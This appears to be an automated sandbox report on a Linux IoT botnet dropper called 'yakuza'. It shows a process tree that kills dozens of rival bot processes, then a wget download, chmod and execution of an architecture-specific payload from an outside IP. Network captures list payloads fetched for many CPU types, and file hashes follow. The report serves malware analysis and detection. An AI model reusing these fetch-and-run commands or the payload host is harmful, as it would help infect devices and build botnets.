/bin/busyboxbusybox pkill -9 123123a4⤵PID:1308
-
-
-
/bin/sh/bin/sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1317 -
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵PID:1318
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:1320
-
-
-
/bin/sh/bin/sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1328 -
/usr/bin/pkillpkill -9 ggTrex4⤵
- Reads runtime system information
PID:1330
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:1332
-
-
-
/bin/sh/bin/sh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1340 -
/usr/bin/pkillpkill -9 wasads4⤵
- Reads CPU attributes
PID:1342
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:1346
-
-
-
/bin/sh/bin/sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:1353
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵
- Reads CPU attributes
PID:1354
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:1358
-
-
-
/bin/sh/bin/sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:1367
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵PID:1369
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1373
-
-
-
/bin/sh/bin/sh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1380 -
/usr/bin/pkillpkill -9 ggt4⤵PID:1381
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1382
-
-
-
/bin/sh/bin/sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1391 -
/usr/bin/pkillpkill -9 wget-log4⤵PID:1392
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1394
-
-
-
/bin/sh/bin/sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1403 -
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵PID:1404
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1406
-
-
-
/bin/sh/bin/sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1415
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵PID:1417
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1418
-
-
-
/bin/sh/bin/sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1428 -
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads runtime system information
PID:1429
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1430
-
-
-
/bin/sh/bin/sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1440 -
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵PID:1441
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1442
-
-
-
/bin/sh/bin/sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1451 -
/usr/bin/pkillpkill -9 SAIAKUSO4⤵PID:1452
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1454
-
-
-
/bin/sh/bin/sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1463 -
/usr/bin/pkillpkill -9 ggtr4⤵
- Reads CPU attributes
PID:1464
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1467
-
-
-
/bin/sh/bin/sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1476
-
/usr/bin/pkillpkill -9 14Fa4⤵PID:1478
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1480
-
-
-
/bin/sh/bin/sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1486 -
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵PID:1489
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1492
-
-
-
/bin/sh/bin/sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1498
-
/usr/bin/pkillpkill -9 ggtt4⤵
- Reads runtime system information
PID:1501
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1504
-
-
-
/bin/sh/bin/sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1513 -
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵PID:1514
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1516
-
-
-
/bin/sh/bin/sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1524
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:1526
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1528
-
-
-
/bin/sh/bin/sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1537 -
/usr/bin/pkillpkill -9 haetrghbr4⤵
- Reads CPU attributes
PID:1538
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1540
-
-
-
/bin/sh/bin/sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1549
-
/usr/bin/pkillpkill -9 19ju3d4⤵
- Reads runtime system information
PID:1550
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1552
-
-
-
/bin/sh/bin/sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1562 -
/usr/bin/pkillpkill -9 SORAojkf1204⤵PID:1564
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1568
-
-
-
/bin/sh/bin/sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1575 -
/usr/bin/pkillpkill -9 hehahejeje924⤵PID:1576
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1582
-
-
-
/bin/sh/bin/sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1588
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵
- Reads CPU attributes
PID:1589
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1592
-
-
-
/bin/sh/bin/sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1600
-
/usr/bin/pkillpkill -9 SlaVLav124⤵PID:1601
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1602
-
-
-
/bin/sh/bin/sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1612
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1613
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1614
-
-
-
/bin/sh/bin/sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1624
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads CPU attributes
PID:1625
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1626
-
-
-
/bin/sh/bin/sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1636 -
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵PID:1637
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1638
-
-
-
/bin/sh/bin/sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1648 -
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵
- Reads runtime system information
PID:1649
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1650
-
-
-
/bin/sh/bin/sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1660 -
/usr/bin/pkillpkill -9 5Gbf4⤵PID:1661
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1662
-
-
-
/bin/sh/bin/sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1674 -
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵PID:1675
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1676
-
-
-
/bin/sh/bin/sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1686 -
/usr/bin/pkillpkill -9 iaGv4⤵
- Reads CPU attributes
PID:1687
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1688
-
-
-
/bin/sh/bin/sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1696 -
/usr/bin/pkillpkill -9 5aA34⤵PID:1697
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1700
-
-
-
/bin/sh/bin/sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1707 -
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵PID:1709
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1712
-
-
-
/bin/sh/bin/sh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1720
-
/usr/bin/pkillpkill -9 insomni4⤵PID:1721
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1726
-
-
-
/bin/sh/bin/sh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1733
-
/usr/bin/pkillpkill -9 6402774⤵PID:1734
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1738
-
-
-
/bin/sh/bin/sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1746 -
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵PID:1747
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1750
-
-
-
/bin/sh/bin/sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1758 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1759
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1762
-
-
-
/bin/sh/bin/sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1772
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵
- Reads runtime system information
PID:1773
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1775
-
-
-
/bin/sh/bin/sh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1784
-
/usr/bin/pkillpkill -9 T4⤵PID:1785
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1788
-
-
-
/bin/sh/bin/sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1796
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵PID:1797
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1800
-
-
-
/bin/sh/bin/sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1808
-
/usr/bin/pkillpkill -9 6ke34⤵PID:1809
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1812
-
-
-
-
/bin/rmrm -rf yakuza.arm72⤵PID:795
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.sparc2⤵
- Writes file to tmp directory
PID:801
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵PID:816
-
-
/bin/rmrm -rf yakuza.sparc2⤵PID:819
-
Network
-
Remote address:79.23.237.23:80RequestGET /yakuza.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "2dff0-62717a159a756"
Accept-Ranges: bytes
Content-Length: 188400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.mipsel HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "2dff0-62717a159da1e"
Accept-Ranges: bytes
Content-Length: 188400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.sh HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "21133-62717a15a012e"
Accept-Ranges: bytes
Content-Length: 135475
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-sh
-
Remote address:79.23.237.23:80RequestGET /yakuza.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "22e31-62717a15a300e"
Accept-Ranges: bytes
Content-Length: 142897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "291e7-62717a15a571e"
Accept-Ranges: bytes
Content-Length: 168423
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "1e0db-62717a15a8216"
Accept-Ranges: bytes
Content-Length: 123099
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "2300d-62717a15aa926"
Accept-Ranges: bytes
Content-Length: 143373
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.i586 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "1df1b-62717a15ad806"
Accept-Ranges: bytes
Content-Length: 122651
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "243a8-62717a15afb2e"
Accept-Ranges: bytes
Content-Length: 148392
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.arm4 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "26639-62717a15b2626"
Accept-Ranges: bytes
Content-Length: 157241
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "24c97-62717a15b5506"
Accept-Ranges: bytes
Content-Length: 150679
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "33ba1-62717a15b7ffe"
Accept-Ranges: bytes
Content-Length: 211873
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Remote address:79.23.237.23:80RequestGET /yakuza.sparc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: 79.23.237.23
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Sun, 17 Nov 2024 08:31:45 GMT
ETag: "25e83-62717a15baaf6"
Accept-Ranges: bytes
Content-Length: 155267
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
4.4kB 201.8kB 80 149
HTTP Request
GET http://79.23.237.23/yakuza.mipsHTTP Response
200 -
4.9kB 196.4kB 91 148
HTTP Request
GET http://79.23.237.23/yakuza.mipselHTTP Response
200 -
3.9kB 141.3kB 71 106
HTTP Request
GET http://79.23.237.23/yakuza.shHTTP Response
200 -
4.5kB 150.4kB 83 112
HTTP Request
GET http://79.23.237.23/yakuza.x86HTTP Response
200 -
4.2kB 175.6kB 77 133
HTTP Request
GET http://79.23.237.23/yakuza.arm6HTTP Response
200 -
240 B 4
-
3.7kB 131.2kB 66 99
HTTP Request
GET http://79.23.237.23/yakuza.i686HTTP Response
200 -
4.6kB 150.6kB 84 107
HTTP Request
GET http://79.23.237.23/yakuza.ppcHTTP Response
200 -
3.8kB 132.0kB 69 97
HTTP Request
GET http://79.23.237.23/yakuza.i586HTTP Response
200 -
3.4kB 157.7kB 60 121
HTTP Request
GET http://79.23.237.23/yakuza.m68kHTTP Response
200 -
3.4kB 163.9kB 63 122
HTTP Request
GET http://79.23.237.23/yakuza.arm4HTTP Response
200 -
240 B 4
-
3.3kB 159.7kB 59 116
HTTP Request
GET http://79.23.237.23/yakuza.arm5HTTP Response
200 -
240 B 4
-
6.1kB 221.6kB 112 155
HTTP Request
GET http://79.23.237.23/yakuza.arm7HTTP Response
200 -
240 B 4
-
4.2kB 162.0kB 78 124
HTTP Request
GET http://79.23.237.23/yakuza.sparcHTTP Response
200 -
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
240 B 4
-
180 B 3
-
180 B 3
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD5fe20c84814e3b28ab3b4d72949f09c9a
SHA10bf1e245ca54ea279f349a6110ea3cf2a90bafc8
SHA256cf50bcd9a2ed02b09dc85b05f13526a850da52e616d16d93224282c464c21468
SHA5129a6d894da0f1c50f7ca27f2452d4dc9f531427a417ebb5a2eaa76bb020279fc8171f2926daf25c25817766ea7bf4b85dec2bec1e28a340cd2548c21ec07b8203